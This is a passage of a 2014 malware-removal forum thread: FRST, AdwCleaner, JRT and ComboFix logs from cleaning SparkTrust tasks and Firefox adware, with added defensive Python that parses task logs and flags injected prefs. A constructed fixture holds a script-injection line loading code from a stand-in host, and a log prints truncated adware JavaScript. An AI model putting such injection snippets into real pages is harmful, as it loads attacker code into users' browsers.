HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7C387643-180A-43F2-861B-7C3746BB7FAB} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Update Version3 Startup Task => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Update Version3 => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} => Key not found.
C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => Key not found.
C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job not found.
C:\Windows\Tasks\SparkTrust Registration3.job not found.
C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job not found.
C:\Windows\Tasks\SparkTrust Update Version3.job not found.


The system needed a reboot.

==== End of Fixlog ====
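The FRST task list earlier in the thread and the fixlog above show the two halves of a scheduled-task persistence: the `Task:` lines (registration GUID, task name, action binary, file date, publisher, and FRST's own `<==== ATTENTION` marker, or `No Task File` for a registration whose XML is gone), and the artifacts a removal has to touch (the task XML under System32\Tasks, the legacy .job file under C:\Windows\Tasks, and the TaskCache registry keys Tasks\{GUID}, Tree\<name>, plus a trigger index such as Plain or Logon). The following Python is an added example, not part of this thread and not FRST's own code: it parses lines in the format shown into records, applies a few triage rules (FRST's flag, orphaned registrations, rundll32 loading a DLL, a missing file date or an empty publisher), and lists the artifacts that back each registration. The sample lines are constructed in the shape of the log above; the triage rules, the artifact list and all function names are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the shape of FRST's "Scheduled Tasks (whitelisted)"
# section; entries mirror lines from the log above, embedded to run offline.
SAMPLE_FRST_TASKS = r"""
Task: {008BA38B-708F-4856-AFD5-7903F65F6B35} - \LaunchApp No Task File
Task: {1D3D8FAB-691B-4E12-95B7-A6B89E2172FE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-13] (Adobe Systems Incorporated)
Task: {34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {746113CB-426A-4600-9D70-1890814BADF2} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} - System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION
"""

TASKCACHE = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache"
ATTENTION = " <==== ATTENTION"     # FRST's own marker
NO_TASK_FILE = " No Task File"     # TaskCache entry whose task XML is gone
GUID_LINE = re.compile(r"^Task: (?P<guid>\{[0-9A-Fa-f-]+\}) - (?P<rest>.*)$")
JOB_LINE = re.compile(r"^Task: (?P<job>[A-Za-z]:\\.*?\.job) => (?P<action>.*)$")
# action, optional "[YYYY-MM-DD]" file date, optional "(Publisher)"; FRST
# prints "()" when the binary has no company name in its version info.
ACTION = re.compile(r"^(?P<action>.*?)(?: \[(?P<date>\d{4}-\d{2}-\d{2})\])?(?: \((?P<publisher>[^)]*)\))?$")


@dataclass
class TaskEntry:
    name: str
    guid: Optional[str] = None        # Task Scheduler 2.0 registration GUID
    job_file: Optional[str] = None    # legacy C:\Windows\Tasks\*.job path
    action: Optional[str] = None
    file_date: Optional[str] = None
    publisher: Optional[str] = None   # None: not printed; "": printed as "()"
    attention: bool = False
    no_task_file: bool = False


def parse_frst_tasks(text: str) -> List[TaskEntry]:
    """Parse FRST 'Task:' lines in both the GUID and the legacy .job form."""
    entries: List[TaskEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("Task: "):
            continue
        attention = line.endswith(ATTENTION)
        if attention:
            line = line[: -len(ATTENTION)]
        m = GUID_LINE.match(line)
        if m:
            guid, rest = m.group("guid"), m.group("rest")
            if rest.endswith(NO_TASK_FILE):
                name = rest[: -len(NO_TASK_FILE)].lstrip("\\")
                entries.append(TaskEntry(name=name, guid=guid, attention=attention, no_task_file=True))
                continue
            name_part, _, action_part = rest.partition(" => ")
            name = re.sub(r"^System32\\Tasks\\", "", name_part, flags=re.I)
            a = ACTION.match(action_part)
            entries.append(TaskEntry(name=name, guid=guid, action=a.group("action"), file_date=a.group("date"),
                                     publisher=a.group("publisher"), attention=attention))
            continue
        m = JOB_LINE.match(line)
        if m:
            name = m.group("job").rsplit("\\", 1)[-1][: -len(".job")]
            entries.append(TaskEntry(name=name, job_file=m.group("job"), action=m.group("action"), attention=attention))
    return entries


def triage(entries: List[TaskEntry]) -> List[tuple]:
    """Heuristic triage. The rules are this example's, not FRST's."""
    findings = []
    for t in entries:
        reasons = []
        if t.attention:
            reasons.append("flagged by FRST")
        if t.no_task_file:
            reasons.append("TaskCache registration whose task XML is missing (orphaned)")
        is_rundll = bool(t.action) and t.action.lower().startswith("rundll32")
        if is_rundll:
            reasons.append("rundll32 loads a DLL export as the task action")
        if t.guid and t.action and not is_rundll and t.file_date is None:
            reasons.append("no file date/publisher captured: target absent or unreadable at scan time")
        elif t.publisher == "":
            reasons.append("target binary has no company name in its version info")
        if reasons:
            findings.append((t, reasons))
    return findings


def removal_artifacts(t: TaskEntry) -> List[str]:
    """Files and keys backing one registration, as the fixlog above shows FRST
    deleting them. The trigger index key (TaskCache Plain, Logon or Boot) is not
    derivable from the log line, so it is emitted as a search hint."""
    items = []
    if t.guid:
        items += [f"{TASKCACHE}\\Tasks\\{t.guid}", f"{TASKCACHE}\\Tree\\{t.name}",
                  f"{TASKCACHE}\\<Plain|Logon|Boot>\\{t.guid}  (search TaskCache for the GUID)",
                  f"C:\\Windows\\System32\\Tasks\\{t.name}"]
    if t.job_file:
        items.append(t.job_file)
    return items
```

Calling `triage(parse_frst_tasks(SAMPLE_FRST_TASKS))` flags the orphaned LaunchApp entry, the three SparkTrust entries and (on the weakest rule, an empty publisher) the HP RecoveryCDWin7 task, while the Flash updater with a current file date and a named publisher passes; `removal_artifacts()` on the SparkTrust Registration3 record yields the same Tasks, Tree and System32\Tasks paths the fixlog reports deleting. The rules are deliberately a starting point for a human review, not a verdict: an empty publisher is common on OEM tooling, and the "target absent" rule only says FRST could not read the file.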

#6 gringo_pr (Bleepin Gringo)
  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico

Posted 19 March 2014 - 05:57 PM



Hello Paulie67

Now let's rerun these.

These are the programs I would like you to run next, if you have any problems with one of these just skip it and move on to the next one.

-AdwCleaner-

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
-Junkware-Removal-Tool-

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
When they are complete let me have the two reports and let me know how things are running.

Gringo

#7 Paulie67 (Topic Starter)
  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 19 March 2014 - 07:28 PM

# AdwCleaner v3.022 - Report created 20/03/2014 at 10:20:12
# Updated 13/03/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Paulette - PAULETTE-PC
# Running from : C:\Users\Paulette\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.16521

-\\ Mozilla Firefox v27.0.1 (en-US)

[ File : C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c4z3ik3q.default\prefs.js ]

[ File : C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\prefs.js ]

Line Deleted : user_pref("extensions.HQvqRcD.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.ind[...]
Line Deleted : user_pref("extensions.Rov.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf[...]

-\\ Google Chrome v33.0.1750.154

[ File : C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [6172 octets] - [17/03/2014 12:39:59]
AdwCleaner[R1].txt - [1770 octets] - [20/03/2014 10:04:50]
AdwCleaner[R2].txt - [1696 octets] - [20/03/2014 10:19:15]
AdwCleaner[S0].txt - [6143 octets] - [17/03/2014 12:43:31]
AdwCleaner[S1].txt - [1837 octets] - [20/03/2014 10:05:54]
AdwCleaner[S2].txt - [1621 octets] - [20/03/2014 10:20:12]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1681 octets] ##########

Hi Gringo,

I realise that I can only use Internet Explorer.

The problem seems to only occur while using Firefox.
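The two `Line Deleted` entries in the AdwCleaner report above are the Firefox-only half of the problem: a preference named `extensions.<random>.scode` whose value is not a setting at all but a JavaScript function that inspects `window.self.location.href` and acts on pages matching its list of strings. That pref is inert on its own; in this family it is read and evaluated by a companion bootstrapped add-on, which is the layout of the `kf@hprqfobf.co.uk` and `pcuoiu@ho-eqn.co.uk` folders (bootstrap.js, chrome.manifest, content\bg.js, install.rdf) that ComboFix removes later in the thread. The Python below is an added example and is not AdwCleaner's or ComboFix's code: it parses `user_pref()` lines from a prefs.js, scores each value for tokens that belong in code rather than configuration, and lists unpacked add-ons that carry a bootstrap.js so a responder can review them. The prefs.js excerpt is constructed (the payload is shortened and points at example.invalid), and the marker list, the threshold and the function names are my own assumptions.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed prefs.js excerpt. The two extensions.*.scode lines copy the
# shape of the entries AdwCleaner deleted above (payload shortened, host
# replaced by example.invalid); the other prefs are ordinary ones for contrast.
SAMPLE_PREFS_JS = r'''
# Mozilla User Preferences
user_pref("browser.startup.homepage", "https://www.example.com/");
user_pref("extensions.lastAppVersion", "27.0.1");
user_pref("extensions.HQvqRcD.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1){var s=document.createElement(\"script\");s.src=\"http://example.invalid/i.js\";document.body.appendChild(s);}}catch(e){}})();");
user_pref("extensions.Rov.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"sumorobo\")>-1){}}catch(e){}})();");
user_pref("network.cookie.cookieBehavior", 0);
user_pref("browser.search.defaultenginename", "Google");
'''

PREF_LINE = re.compile(r'^user_pref\("(?P<key>[^"]+)",\s*(?P<value>.*)\);\s*$')
JS_STRING = re.compile(r'^"(?P<body>(?:[^"\\]|\\.)*)"$')
# Tokens that have no business inside a preference value. One point each;
# two points flag the pref. The list and the weighting are this example's.
JS_MARKERS = ("function(", "window.", "document.", "location.href", "eval(",
              "createElement(", ".src=", "appendChild(", "indexOf(", "try{")


def parse_prefs(text: str) -> Dict[str, str]:
    """Return {pref: value} for every user_pref() line. JavaScript string
    values have their backslash escapes removed; numbers and booleans are
    kept as written."""
    prefs: Dict[str, str] = {}
    for raw in text.splitlines():
        m = PREF_LINE.match(raw.strip())
        if not m:
            continue
        value = m.group("value")
        s = JS_STRING.match(value)
        if s:
            value = re.sub(r"\\(.)", r"\1", s.group("body"))
        prefs[m.group("key")] = value
    return prefs


def find_injected_prefs(text: str, threshold: int = 2) -> List[Tuple[str, List[str]]]:
    """Flag prefs whose value reads like code rather than configuration.
    The pattern seen in this thread keeps page-injection JavaScript under a
    random extensions.<id>.scode key, so that key shape scores as well."""
    hits = []
    for key, value in parse_prefs(text).items():
        markers = [tok for tok in JS_MARKERS if tok in value]
        if key.startswith("extensions.") and key.endswith(".scode"):
            markers.insert(0, "*.scode key")
        if len(markers) >= threshold:
            hits.append((key, markers))
    return hits


def list_bootstrap_extensions(extensions_dir: str) -> List[str]:
    """IDs of unpacked add-ons that carry a bootstrap.js, the layout of the
    add-on folders ComboFix removes later in this thread. Returns [] when the
    directory does not exist, so it is safe on a profile without one."""
    if not os.path.isdir(extensions_dir):
        return []
    return sorted(d for d in os.listdir(extensions_dir)
                  if os.path.isfile(os.path.join(extensions_dir, d, "bootstrap.js")))


if __name__ == "__main__":
    for key, markers in find_injected_prefs(SAMPLE_PREFS_JS):
        print(key, "->", ", ".join(markers))
```

On a live profile, run `find_injected_prefs(open(prefs_path).read())` and `list_bootstrap_extensions(os.path.join(profile_dir, "extensions"))` for each profile under AppData\Roaming\Mozilla\Firefox\Profiles, including the Guest account's, since the ComboFix log shows the same add-ons in both. Remove the pref and the add-on together: deleting only the pref, as the AdwCleaner pass above did, leaves the loader in place to be repopulated.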



#8 Paulie67 (Topic Starter)
  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 19 March 2014 - 07:58 PM

Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.2 (02.20.2014:1)
OS: Windows 7 Home Premium x64
Ran by Paulette on Thu 20/03/2014 at 10:35:33.80
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Registry Values

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\sparktrust

~~~ Files

~~~ Folders

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 20/03/2014 at 10:46:32.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#9 gringo_pr (Bleepin Gringo)
  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico

Posted 22 March 2014 - 04:01 AM


Hello Paulie67

I Would like you to do the following.

Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

Run Combofix:

You may be asked to install or update the Recovery Console (Win XP Only); if this happens, please allow it to do so (you will need to be connected to the internet for this).

Before you run Combofix I will need you to turn off any security software you have running. If you do not know how to do this you can find out >here< or >here<

Combofix may need to reboot your computer more than once to do its job; this is normal.

You can download Combofix from one of these links. I want you to save it to the desktop and run it from there.
1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." Please restart the computer

"information and logs"
  • In your next post I need the following
  • Log from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now?
Gringo

#10 Paulie67 (Topic Starter)
  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 24 March 2014 - 09:49 PM

Hi Gringo, I have run the ComboFix, thank you so much for your assistance. Following is the report that came after ComboFix ran.


ComboFix 14-03-24.01 - Paulette 25/03/2014   8:12.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.61.1033.18.2047.584 [GMT 10:00]
Running from: c:\users\Paulette\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
FW: avast! Antivirus *Disabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\bootstrap.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\chrome.manifest
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\content\bg.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\install.rdf
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\bootstrap.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\chrome.manifest
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\content\bg.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\install.rdf
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\bootstrap.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\chrome.manifest
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\content\bg.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\install.rdf
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\bootstrap.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\chrome.manifest
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\content\bg.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\install.rdf
.
.
(((((((((((((((((((((((((   Files Created from 2014-02-24 to 2014-03-24  )))))))))))))))))))))))))))))))
.
.
2014-03-24 23:11 . 2014-03-24 23:11 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-24 23:11 . 2014-03-24 23:11 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-03-18 14:41 . 2014-03-19 21:58 -------- d-----w- C:\FRST
2014-03-17 03:09 . 2014-03-17 03:09 -------- d-----w- c:\windows\ERUNT
2014-03-17 02:39 . 2014-03-20 00:20 -------- d-----w- C:\AdwCleaner
2014-03-17 01:12 . 2014-03-17 01:12 -------- d-----w- c:\program files (x86)\Common Files\SparkTrust
2014-03-16 05:22 . 2014-03-16 05:22 440672 ----a-w- c:\windows\system32\drivers\aswndisflt.sys
2014-03-16 05:19 . 2014-03-16 05:19 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVAST Software
2014-03-15 23:06 . 2014-03-15 23:06 80184 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-03-15 23:06 . 2014-03-15 23:06 207904 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-03-15 23:06 . 2014-03-15 23:06 65776 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-03-15 23:06 . 2014-03-15 23:06 421704 ----a-w- c:\windows\system32\drivers\aswSP.sys
2014-03-15 23:06 . 2014-03-15 23:06 1038072 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-03-15 23:06 . 2014-03-15 23:06 92544 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-03-15 23:06 . 2014-03-15 23:06 78648 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-03-15 23:06 . 2014-03-15 23:06 28184 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2014-03-15 23:06 . 2014-03-15 23:06 334136 ----a-w- c:\windows\system32\aswBoot.exe
2014-03-15 23:06 . 2014-03-15 23:06 43152 ----a-w- c:\windows\avastSS.scr
2014-03-15 23:05 . 2014-03-15 23:05 -------- d-----w- c:\program files\AVAST Software
2014-03-15 23:02 . 2014-03-15 23:02 -------- d-----w- c:\programdata\AVAST Software
2014-03-12 22:58 . 2014-02-04 02:32 624128 ----a-w- c:\windows\system32\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:04 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:32 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-03-12 22:58 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-03-09 23:02 . 2014-03-09 23:02 -------- d-----w- c:\users\Paulette\AppData\Roaming\Malwarebytes
2014-03-09 22:00 . 2014-03-10 03:20 -------- d-----w- c:\users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-09 03:27 . 2013-12-17 23:38 40248 ----a-w- c:\windows\system32\TURegOpt.exe
2014-03-09 03:27 . 2013-12-17 23:38 29496 ----a-w- c:\windows\system32\authuitu.dll
2014-03-09 03:27 . 2013-12-17 23:38 25400 ----a-w- c:\windows\SysWow64\authuitu.dll
2014-03-09 03:27 . 2014-03-09 03:27 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVG
2014-03-09 03:25 . 2014-03-09 03:29 -------- d-----w- c:\programdata\AVG
2014-03-09 03:25 . 2014-03-09 03:33 -------- d-sh--w- c:\programdata\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-02-28 00:28 . 2014-03-15 21:29 -------- d-----w- c:\program files (x86)\MediaViewV1
2014-02-24 23:17 . 2014-02-24 23:17 -------- d-----w- c:\program files (x86)\MediaViewerV1
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-19 10:46 . 2014-01-20 11:20 90015360 ----a-w- c:\windows\system32\MRT.exe
2014-03-12 21:17 . 2014-02-06 09:45 71048 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 21:17 . 2014-02-06 09:45 692616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-01-29 22:57 . 2014-01-29 22:57 194048 ----a-w- c:\windows\SysWow64\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 645120 ----a-w- c:\windows\SysWow64\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 235008 ----a-w- c:\windows\system32\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 71680 ----a-w- c:\windows\SysWow64\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 182272 ----a-w- c:\windows\SysWow64\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\SysWow64\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 34816 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 337408 ----a-w- c:\windows\SysWow64\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 24576 ----a-w- c:\windows\SysWow64\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 151552 ----a-w- c:\windows\SysWow64\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 139264 ----a-w- c:\windows\SysWow64\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 1051136 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 61952 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 36352 ----a-w- c:\windows\SysWow64\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\SysWow64\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\SysWow64\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 74240 ----a-w- c:\windows\SysWow64\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\SysWow64\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 111616 ----a-w- c:\windows\SysWow64\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 942592 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 247808 ----a-w- c:\windows\system32\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 90112 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 52224 ----a-w- c:\windows\system32\msfeedsbs.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\system32\msfeedssync.exe
2014-01-29 22:56 . 2014-01-29 22:56 131072 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 105984 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 77312 ----a-w- c:\windows\system32\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 40448 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 616104 ----a-w- c:\windows\system32\ieapfltr.dat
2014-01-29 22:56 . 2014-01-29 22:56 453120 ----a-w- c:\windows\system32\dxtmsft.dll
2014-01-29 22:56 . 2014-01-29 22:56 413696 ----a-w- c:\windows\system32\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 296960 ----a-w- c:\windows\system32\dxtrans.dll
2014-01-29 22:56 . 2014-01-29 22:56 81408 ----a-w- c:\windows\system32\icardie.dll
2014-01-29 22:56 . 2014-01-29 22:56 235520 ----a-w- c:\windows\system32\url.dll
2014-01-29 22:56 . 2014-01-29 22:56 1228800 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 263376 ----a-w- c:\windows\system32\iedkcs32.dll
2014-01-29 22:56 . 2014-01-29 22:56 84992 ----a-w- c:\windows\system32\mshtmled.dll
2014-01-29 22:56 . 2014-01-29 22:56 30208 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 243200 ----a-w- c:\windows\system32\webcheck.dll
2014-01-29 22:56 . 2014-01-29 22:56 101376 ----a-w- c:\windows\system32\inseng.dll
2014-01-29 22:56 . 2014-01-29 22:56 167424 ----a-w- c:\windows\system32\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 143872 ----a-w- c:\windows\system32\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\system32\pngfilt.dll
